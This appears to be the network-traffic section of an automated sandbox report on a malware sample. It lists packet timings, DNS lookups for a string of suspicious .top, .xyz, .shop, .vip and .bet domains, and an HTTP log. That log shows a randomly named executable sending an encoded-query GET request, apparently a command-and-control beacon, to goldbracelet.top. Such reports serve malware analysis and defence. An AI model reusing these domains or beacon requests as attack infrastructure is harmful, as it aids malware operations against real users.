Jan 10, 2025 20:25:46.170854092 CET	80	55719	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:46.171042919 CET	55719	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:47.182372093 CET	55719	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:48.202347040 CET	55720	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:48.207285881 CET	80	55720	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:48.207365990 CET	55720	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:48.216499090 CET	55720	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:48.221287966 CET	80	55720	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:48.702064991 CET	80	55720	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:48.728008986 CET	80	55720	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:48.728029013 CET	80	55720	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:48.728161097 CET	55720	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:48.730899096 CET	55720	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:48.735738993 CET	80	55720	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:54.125154018 CET	55721	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:54.130072117 CET	80	55721	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:54.130167961 CET	55721	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:54.146045923 CET	55721	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:54.150871038 CET	80	55721	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:54.768569946 CET	80	55721	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:54.769889116 CET	80	55721	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:54.769903898 CET	80	55721	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:54.769932032 CET	55721	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:54.769965887 CET	55721	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:55.651046991 CET	55721	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:56.670087099 CET	55722	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:56.675193071 CET	80	55722	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:56.675275087 CET	55722	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:56.690526009 CET	55722	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:56.695370913 CET	80	55722	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:57.360820055 CET	80	55722	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:57.362040997 CET	80	55722	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:57.362093925 CET	55722	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:58.198263884 CET	55722	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:59.218997955 CET	55723	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:59.224159002 CET	80	55723	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:59.224275112 CET	55723	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:59.239304066 CET	55723	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:59.244359970 CET	80	55723	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:59.244502068 CET	80	55723	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:59.946522951 CET	80	55723	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:59.947032928 CET	80	55723	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:59.947078943 CET	55723	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:25:59.947105885 CET	80	55723	104.21.48.233	192.168.2.9
Jan 10, 2025 20:25:59.947158098 CET	55723	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:26:00.744863033 CET	55723	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:26:01.765070915 CET	55724	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:26:01.769958973 CET	80	55724	104.21.48.233	192.168.2.9
Jan 10, 2025 20:26:01.770080090 CET	55724	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:26:01.786834955 CET	55724	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:26:01.791737080 CET	80	55724	104.21.48.233	192.168.2.9
Jan 10, 2025 20:26:02.455705881 CET	80	55724	104.21.48.233	192.168.2.9
Jan 10, 2025 20:26:02.455723047 CET	80	55724	104.21.48.233	192.168.2.9
Jan 10, 2025 20:26:02.455837965 CET	80	55724	104.21.48.233	192.168.2.9
Jan 10, 2025 20:26:02.455905914 CET	55724	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:26:02.455943108 CET	55724	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:26:02.458621025 CET	55724	80	192.168.2.9	104.21.48.233
Jan 10, 2025 20:26:02.463454962 CET	80	55724	104.21.48.233	192.168.2.9
Jan 10, 2025 20:26:07.531523943 CET	55725	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:07.536504030 CET	80	55725	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:07.536583900 CET	55725	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:07.552290916 CET	55725	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:07.557152987 CET	80	55725	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:08.025763988 CET	80	55725	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:08.025790930 CET	80	55725	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:08.025897026 CET	55725	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:08.027084112 CET	80	55725	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:08.027194977 CET	55725	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:09.057308912 CET	55725	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:10.076287031 CET	55726	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:10.081113100 CET	80	55726	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:10.081242085 CET	55726	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:10.097136974 CET	55726	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:10.102777958 CET	80	55726	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:10.552212000 CET	80	55726	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:10.552229881 CET	80	55726	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:10.552242041 CET	80	55726	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:10.552402973 CET	55726	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:10.552402973 CET	55726	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:11.604294062 CET	55726	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:12.622859001 CET	55727	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:12.627746105 CET	80	55727	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:12.627887964 CET	55727	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:12.643238068 CET	55727	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:12.648586988 CET	80	55727	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:12.648608923 CET	80	55727	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:13.091089010 CET	80	55727	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:13.091110945 CET	80	55727	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:13.091156960 CET	55727	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:13.091176033 CET	80	55727	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:13.091223001 CET	55727	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:14.151182890 CET	55727	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:15.179686069 CET	55728	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:15.186999083 CET	80	55728	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:15.187103987 CET	55728	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:15.197410107 CET	55728	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:15.202316046 CET	80	55728	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:15.661473036 CET	80	55728	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:15.661521912 CET	80	55728	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:15.661557913 CET	80	55728	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:15.661705017 CET	55728	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:15.661887884 CET	55728	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:15.664444923 CET	55728	80	192.168.2.9	199.59.243.228
Jan 10, 2025 20:26:15.669290066 CET	80	55728	199.59.243.228	192.168.2.9
Jan 10, 2025 20:26:21.044547081 CET	55729	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:21.049397945 CET	80	55729	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:21.049882889 CET	55729	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:21.064642906 CET	55729	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:21.069399118 CET	80	55729	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:21.954849958 CET	80	55729	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:21.954933882 CET	80	55729	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:21.954979897 CET	55729	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:22.573889971 CET	55729	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:23.592139959 CET	55730	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:23.596997976 CET	80	55730	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:23.597064972 CET	55730	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:23.614312887 CET	55730	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:23.619146109 CET	80	55730	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:24.470488071 CET	80	55730	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:24.470532894 CET	80	55730	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:24.470607042 CET	55730	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:25.121907949 CET	55730	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:26.140690088 CET	55731	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:26.145622015 CET	80	55731	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:26.145718098 CET	55731	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:26.162816048 CET	55731	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:26.167716980 CET	80	55731	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:26.167848110 CET	80	55731	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:27.026252031 CET	80	55731	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:27.026998997 CET	80	55731	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:27.027328014 CET	55731	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:27.666697979 CET	55731	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:28.685610056 CET	55732	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:28.690454006 CET	80	55732	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:28.690694094 CET	55732	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:28.700730085 CET	55732	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:28.705542088 CET	80	55732	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:29.575344086 CET	80	55732	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:29.575421095 CET	80	55732	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:29.575519085 CET	55732	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:29.578690052 CET	55732	80	192.168.2.9	8.136.96.106
Jan 10, 2025 20:26:29.583503008 CET	80	55732	8.136.96.106	192.168.2.9
Jan 10, 2025 20:26:34.628228903 CET	55733	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:34.633219957 CET	80	55733	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:34.633457899 CET	55733	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:34.650109053 CET	55733	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:34.655025005 CET	80	55733	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:35.237178087 CET	80	55733	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:35.237262011 CET	80	55733	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:35.237320900 CET	55733	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:36.151093006 CET	55733	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:37.171953917 CET	55734	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:37.176795006 CET	80	55734	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:37.176970005 CET	55734	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:37.200119019 CET	55734	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:37.204904079 CET	80	55734	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:37.821089983 CET	80	55734	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:37.821110964 CET	80	55734	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:37.821173906 CET	55734	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:38.697962046 CET	55734	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:39.717269897 CET	55735	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:39.804481030 CET	80	55735	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:39.804552078 CET	55735	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:39.821970940 CET	55735	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:39.826889038 CET	80	55735	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:39.826924086 CET	80	55735	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:40.397304058 CET	80	55735	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:40.397402048 CET	80	55735	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:40.397464991 CET	55735	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:41.338677883 CET	55735	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:42.357781887 CET	55736	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:42.362606049 CET	80	55736	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:42.362687111 CET	55736	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:42.373143911 CET	55736	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:42.378002882 CET	80	55736	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:42.949148893 CET	80	55736	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:42.949228048 CET	80	55736	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:42.949423075 CET	55736	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:42.952254057 CET	55736	80	192.168.2.9	69.57.163.64
Jan 10, 2025 20:26:42.957122087 CET	80	55736	69.57.163.64	192.168.2.9
Jan 10, 2025 20:26:48.383907080 CET	55737	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:48.388725996 CET	80	55737	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:48.388806105 CET	55737	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:48.405288935 CET	55737	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:48.410120964 CET	80	55737	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:49.424448967 CET	80	55737	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:49.425134897 CET	80	55737	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:49.425157070 CET	80	55737	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:49.425188065 CET	55737	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:49.425225973 CET	55737	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:49.916764975 CET	55737	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:50.944006920 CET	55738	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:50.948914051 CET	80	55738	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:50.949091911 CET	55738	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:50.967348099 CET	55738	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:50.972281933 CET	80	55738	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:51.754992962 CET	80	55738	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:51.756968021 CET	80	55738	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:51.757060051 CET	80	55738	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:51.757072926 CET	55738	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:51.757112026 CET	55738	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:52.932817936 CET	55738	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:53.951387882 CET	55739	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:53.956399918 CET	80	55739	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:53.956486940 CET	55739	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:53.971945047 CET	55739	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:53.976994038 CET	80	55739	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:53.977099895 CET	80	55739	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:54.785238028 CET	80	55739	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:54.785387993 CET	80	55739	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:54.785439014 CET	55739	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:55.479331970 CET	55739	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:56.498035908 CET	55740	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:56.503182888 CET	80	55740	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:56.503278017 CET	55740	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:56.512717009 CET	55740	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:56.517524004 CET	80	55740	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:57.365602970 CET	80	55740	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:57.366575956 CET	80	55740	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:57.366616964 CET	80	55740	170.33.13.246	192.168.2.9
Jan 10, 2025 20:26:57.366655111 CET	55740	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:57.366656065 CET	55740	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:57.371377945 CET	55740	80	192.168.2.9	170.33.13.246
Jan 10, 2025 20:26:57.376333952 CET	80	55740	170.33.13.246	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:25:23.895626068 CET	61361	53	192.168.2.9	1.1.1.1
Jan 10, 2025 20:25:24.442383051 CET	53	61361	1.1.1.1	192.168.2.9
Jan 10, 2025 20:25:32.220407963 CET	53	54217	162.159.36.2	192.168.2.9
Jan 10, 2025 20:25:32.714462996 CET	53	60597	1.1.1.1	192.168.2.9
Jan 10, 2025 20:25:40.014324903 CET	49276	53	192.168.2.9	1.1.1.1
Jan 10, 2025 20:25:40.538053036 CET	53	49276	1.1.1.1	192.168.2.9
Jan 10, 2025 20:25:53.749589920 CET	61450	53	192.168.2.9	1.1.1.1
Jan 10, 2025 20:25:54.122396946 CET	53	61450	1.1.1.1	192.168.2.9
Jan 10, 2025 20:26:07.467793941 CET	56831	53	192.168.2.9	1.1.1.1
Jan 10, 2025 20:26:07.528923988 CET	53	56831	1.1.1.1	192.168.2.9
Jan 10, 2025 20:26:20.673901081 CET	53968	53	192.168.2.9	1.1.1.1
Jan 10, 2025 20:26:21.041636944 CET	53	53968	1.1.1.1	192.168.2.9
Jan 10, 2025 20:26:34.594199896 CET	65519	53	192.168.2.9	1.1.1.1
Jan 10, 2025 20:26:34.625608921 CET	53	65519	1.1.1.1	192.168.2.9
Jan 10, 2025 20:26:47.969475031 CET	64104	53	192.168.2.9	1.1.1.1
Jan 10, 2025 20:26:48.381052971 CET	53	64104	1.1.1.1	192.168.2.9
Jan 10, 2025 20:27:02.389220953 CET	52699	53	192.168.2.9	1.1.1.1
Jan 10, 2025 20:27:02.417453051 CET	53	52699	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 20:25:23.895626068 CET	192.168.2.9	1.1.1.1	0x3717	Standard query (0)	www.goldbracelet.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:25:40.014324903 CET	192.168.2.9	1.1.1.1	0x536b	Standard query (0)	www.pku-cs-cjw.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:25:53.749589920 CET	192.168.2.9	1.1.1.1	0x60dc	Standard query (0)	www.ausyva4.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:26:07.467793941 CET	192.168.2.9	1.1.1.1	0xfc02	Standard query (0)	www.969-usedcar02.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:26:20.673901081 CET	192.168.2.9	1.1.1.1	0xe465	Standard query (0)	www.juewucangku.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:26:34.594199896 CET	192.168.2.9	1.1.1.1	0xe74	Standard query (0)	www.startsomething.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:26:47.969475031 CET	192.168.2.9	1.1.1.1	0x89c3	Standard query (0)	www.opro.vip	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:02.389220953 CET	192.168.2.9	1.1.1.1	0x38e7	Standard query (0)	www.santillo.bet	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 20:24:43.162602901 CET	1.1.1.1	192.168.2.9	0x6f4a	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:24:43.162602901 CET	1.1.1.1	192.168.2.9	0x6f4a	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:25:24.442383051 CET	1.1.1.1	192.168.2.9	0x3717	No error (0)	www.goldbracelet.top		104.21.36.239	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:25:24.442383051 CET	1.1.1.1	192.168.2.9	0x3717	No error (0)	www.goldbracelet.top		172.67.201.49	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:25:40.538053036 CET	1.1.1.1	192.168.2.9	0x536b	No error (0)	www.pku-cs-cjw.top	187370.github.io		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:25:40.538053036 CET	1.1.1.1	192.168.2.9	0x536b	No error (0)	187370.github.io		185.199.108.153	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:25:40.538053036 CET	1.1.1.1	192.168.2.9	0x536b	No error (0)	187370.github.io		185.199.109.153	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:25:40.538053036 CET	1.1.1.1	192.168.2.9	0x536b	No error (0)	187370.github.io		185.199.110.153	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:25:40.538053036 CET	1.1.1.1	192.168.2.9	0x536b	No error (0)	187370.github.io		185.199.111.153	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:25:54.122396946 CET	1.1.1.1	192.168.2.9	0x60dc	No error (0)	www.ausyva4.top		104.21.48.233	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:25:54.122396946 CET	1.1.1.1	192.168.2.9	0x60dc	No error (0)	www.ausyva4.top		172.67.188.88	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:26:07.528923988 CET	1.1.1.1	192.168.2.9	0xfc02	No error (0)	www.969-usedcar02.shop		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:26:21.041636944 CET	1.1.1.1	192.168.2.9	0xe465	No error (0)	www.juewucangku.xyz		8.136.96.106	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:26:34.625608921 CET	1.1.1.1	192.168.2.9	0xe74	No error (0)	www.startsomething.xyz		69.57.163.64	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:26:48.381052971 CET	1.1.1.1	192.168.2.9	0x89c3	No error (0)	www.opro.vip	overdue.aliyun.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:26:48.381052971 CET	1.1.1.1	192.168.2.9	0x89c3	No error (0)	overdue.aliyun.com		170.33.13.246	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:27:02.417453051 CET	1.1.1.1	192.168.2.9	0x38e7	No error (0)	www.santillo.bet	santillo.bet		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:27:02.417453051 CET	1.1.1.1	192.168.2.9	0x38e7	No error (0)	santillo.bet		66.235.200.145	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.goldbracelet.top

www.pku-cs-cjw.top

www.ausyva4.top

www.969-usedcar02.shop

www.juewucangku.xyz

www.startsomething.xyz

www.opro.vip

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49954	104.21.36.239	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:25:24.479401112 CET	460	OUT	GET /3e00/?rVu4SxF=vcWi2Nuzfs8bFUYEQnXoBGbuOVlE2i7vXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCK31lP9N0MfL58cB+/rM1htgjxM9asHw==&JXYh=X6eL8Vp0 HTTP/1.1 Host: www.goldbracelet.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Jan 10, 2025 20:25:24.969162941 CET	939	IN	HTTP/1.1 403 Forbidden Date: Fri, 10 Jan 2025 19:25:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=54VorZ5JY1Gdh0UWRDompu09qwZpZJmOxY4DIMV7%2B%2Fz%2BDbKnoRdRfKR6zbfRfsihJtVJatTvL%2ByvFkRUndvAE0lhJFxceNUCdf43tsx8CMRv1qxROEKxxmPHXfNVICo7moj0lAv%2Bqw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff0d867e7b159f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1824&rtt_var=912&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	55717	185.199.108.153	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
